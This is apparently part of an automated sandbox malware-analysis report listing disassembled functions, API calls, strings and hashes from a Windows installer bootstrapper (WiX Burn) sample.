                                                                                                                                                                                                                                                                                                  • Opcode ID: ecdf5734c807cbbff313a49742c90df12f8ed8df47a63c3309d0d6f9025d961c
                                                                                                                                                                                                                                                                                                  • Instruction ID: b8da31d3e776a40ad72d0f81b27f6a1bfcc898f3a070086bb164a1307dae48b0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecdf5734c807cbbff313a49742c90df12f8ed8df47a63c3309d0d6f9025d961c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9410832A80729F7DB3196548C0AFEA7669FB51B10F518060FA0CFA285DF71DE4487E1
                                                                                                                                                                                                                                                                                                  Function 0087492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 0087495A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00874967
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00874A12
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00874A1C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1948546556-773887359
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9b98b2c3d048bdd56aeadfe2d70bf0682ddeb86592edf327ba6a13c31fa1e29f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 32dcbad5d2e0d716f684222766f385285ceca98758d44ddc4df6cb2f32d27708
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b98b2c3d048bdd56aeadfe2d70bf0682ddeb86592edf327ba6a13c31fa1e29f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58310232D80239ABDB109AA58C46BABFA68FB00721F11D125FD58E6291E774DD008AD1
                                                                                                                                                                                                                                                                                                  Function 0087E2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadBitmapW.USER32(?,00000001), ref: 0087E2E5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E2F1
                                                                                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0087E338
                                                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0087E359
                                                                                                                                                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0087E36B
                                                                                                                                                                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 0087E381
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                                                                                                                                                                  • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2342928100-598475503
                                                                                                                                                                                                                                                                                                  • Opcode ID: da01c73b334757a14a9755571ca471f1d08f47192c28acd132bac5fc2a7ee491
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e2041667b13765774f6afd3d532c0854f2ff7718de520839fffc68a5d52a655
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da01c73b334757a14a9755571ca471f1d08f47192c28acd132bac5fc2a7ee491
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4314171A00619AFDB10DFA8D989A9EBBF4FF08710F148155E914EB385DB74E9008BA1
                                                                                                                                                                                                                                                                                                  Function 008750CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,?,008AB500), ref: 008750D3
                                                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00875171
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0087518A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentHandle
                                                                                                                                                                                                                                                                                                  • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                                                                                                                                                  • API String ID: 2815245435-1352204306
                                                                                                                                                                                                                                                                                                  • Opcode ID: e83281efd3bf48d7abb25a7f1b4084f7704d1bbe383fbc8e0cb7d6ee194adedc
                                                                                                                                                                                                                                                                                                  • Instruction ID: e22ad5ee7585c5391216e9ec94191e7ea6dd3639c45c9bbf61d43df2b45c9883
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e83281efd3bf48d7abb25a7f1b4084f7704d1bbe383fbc8e0cb7d6ee194adedc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D21687590161DFFDF119F98CC82AAEBB78FF05351B40816AF819E2312D7719E109BA1
                                                                                                                                                                                                                                                                                                  Function 00866882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008668AC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 008668B3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008668BD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00866929
                                                                                                                                                                                                                                                                                                  • Failed to find DllGetVersion entry point in msi.dll., xrefs: 008668EB
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 008668E1
                                                                                                                                                                                                                                                                                                  • Failed to get msi.dll version info., xrefs: 00866905
                                                                                                                                                                                                                                                                                                  • DllGetVersion, xrefs: 0086689E
                                                                                                                                                                                                                                                                                                  • msi, xrefs: 008668A3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4275029093-842451892
                                                                                                                                                                                                                                                                                                  • Opcode ID: 727d1c63de826baf9241ea801f1a4b9b6099b8676d380f16e0c9ae60f21fe7ce
                                                                                                                                                                                                                                                                                                  • Instruction ID: 896dfab8c7e399eff55c71de39f7de3a571a2707856479491d7c71a0f90146ad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 727d1c63de826baf9241ea801f1a4b9b6099b8676d380f16e0c9ae60f21fe7ce
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211DA72E40779B6E720AB7C9C42ABFBB64FB05750F010525FD11F7641EA749C1486E1
                                                                                                                                                                                                                                                                                                  Function 0086D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,008647FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0086548E,?), ref: 0086D6DA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008647FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0086548E,?,?), ref: 0086D6E7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0086D71F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008647FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0086548E,?,?), ref: 0086D72B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1866314245-2276003667
                                                                                                                                                                                                                                                                                                  • Opcode ID: a6f53e7139c053bfc8308d0d1471ad00be2198f3b4c3f641f1587c04261f41db
                                                                                                                                                                                                                                                                                                  • Instruction ID: 62ca87e72144251aa54832202f969a9e101861fac73c6d389df2664215a7ae33
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6f53e7139c053bfc8308d0d1471ad00be2198f3b4c3f641f1587c04261f41db
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA11B237F81B32ABE73156949C05B5B6A94FB06B21F024525FF20FB682EF64DC0086D2
                                                                                                                                                                                                                                                                                                  Function 00861175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861186
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861191
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0086119F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611BA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008611C2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611D7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                                                                                                                                                                  • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                                                                                  • API String ID: 3104334766-1824683568
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e410dc4c6b89b8cab06c74c46e75a2fef2aae6e97c491364c4ac8b19debc6a0
                                                                                                                                                                                                                                                                                                  • Instruction ID: c70d74f1a8892c15a01bf60c213078ef6b19909640edec65876072b31e010f62
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e410dc4c6b89b8cab06c74c46e75a2fef2aae6e97c491364c4ac8b19debc6a0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA017131B0061ABBEB106BA69C49DAF7F5CFB43761B055021FA25D2542EB70DA01CBF1
                                                                                                                                                                                                                                                                                                  Function 0087F639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0087F64E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0087F7C9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • UX did not provide container or payload id., xrefs: 0087F7B8
                                                                                                                                                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0087F6A3
                                                                                                                                                                                                                                                                                                  • Failed to set download password., xrefs: 0087F777
                                                                                                                                                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0087F6F3
                                                                                                                                                                                                                                                                                                  • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0087F6B9
                                                                                                                                                                                                                                                                                                  • Failed to set download URL., xrefs: 0087F728
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0087F668
                                                                                                                                                                                                                                                                                                  • Failed to set download user., xrefs: 0087F751
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2615595102
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3738b19ef8267822132e2495f1cc9d9aa9188b93a4eca05ed0f554f13f1269aa
                                                                                                                                                                                                                                                                                                  • Instruction ID: ff553fcd012c15ddfa424e433c93a1c50c86c0b1e7ce19585895a6732b0af1e9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3738b19ef8267822132e2495f1cc9d9aa9188b93a4eca05ed0f554f13f1269aa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5412932A00652EBDB299F29CC85E6A73A8FF15750B15C135F918E735ADB34EC40C792
                                                                                                                                                                                                                                                                                                  Function 008A5A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 008A5A9B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5AA9
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 008A5AEA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5AF7
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008A5C6A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008A5C79
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                                                                                                                                                  • String ID: GET$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2028584396-3303425918
                                                                                                                                                                                                                                                                                                  • Opcode ID: c899576842e587eb5facc181c476a059c2d4de4c70e1e5f20f55a9a5985c1972
                                                                                                                                                                                                                                                                                                  • Instruction ID: 32402044a047e5ec6695a095c0edc26a0a3475a97ce27375d5c57be33389b5c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c899576842e587eb5facc181c476a059c2d4de4c70e1e5f20f55a9a5985c1972
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B614B72A00619ABEB11CFA4CC45BAEBBB8FF49765F150119FE14F7640E770D9808BA0
                                                                                                                                                                                                                                                                                                  Function 00870C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00871020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00870C6F,?,00000000,?,00000000,00000000), ref: 0087104F
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00870DF3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00870E00
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create syncpoint event., xrefs: 00870E2E
                                                                                                                                                                                                                                                                                                  • plan.cpp, xrefs: 00870E24
                                                                                                                                                                                                                                                                                                  • Failed to append cache action., xrefs: 00870D4A
                                                                                                                                                                                                                                                                                                  • Failed to append rollback cache action., xrefs: 00870CCF
                                                                                                                                                                                                                                                                                                  • Failed to append package start action., xrefs: 00870C95
                                                                                                                                                                                                                                                                                                  • Failed to append payload cache action., xrefs: 00870DAA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareCreateErrorEventLastString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 801187047-2489563283
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c7c43e9b4af2c76680b93e39cbbcb6a652a8b8e31d12fc29ae6f501adee0f24
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad7b910648e340db2d55063746681899d29cab177b57f957e7c986a450106196
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7c43e9b4af2c76680b93e39cbbcb6a652a8b8e31d12fc29ae6f501adee0f24
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29615B76500609EFCB15DF58C980AAABBF9FF84314B21845AE909DB315EB31EA41DB50
                                                                                                                                                                                                                                                                                                  Function 008705A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008AB500,00000000,?), ref: 008706D3
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008AB500,00000000,?), ref: 008706E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0087061A,?,00000000,00020006), ref: 008A0C0E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls.RebootRequired, xrefs: 008705F0
                                                                                                                                                                                                                                                                                                  • Failed to delete registration key: %ls, xrefs: 00870681
                                                                                                                                                                                                                                                                                                  • Failed to write volatile reboot required registry key., xrefs: 0087061E
                                                                                                                                                                                                                                                                                                  • Failed to update resume mode., xrefs: 008706B7
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 008705AC
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 0087071A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$Create
                                                                                                                                                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 359002179-3398658923
                                                                                                                                                                                                                                                                                                  • Opcode ID: 99b6240346143be2e3dfda900a22708fa36d8d1bec557d38e449bc78874bf1bc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43bfe3e3aaf3bba7719088eacb841f902df394aa07e7314cd3963809fb8d3545
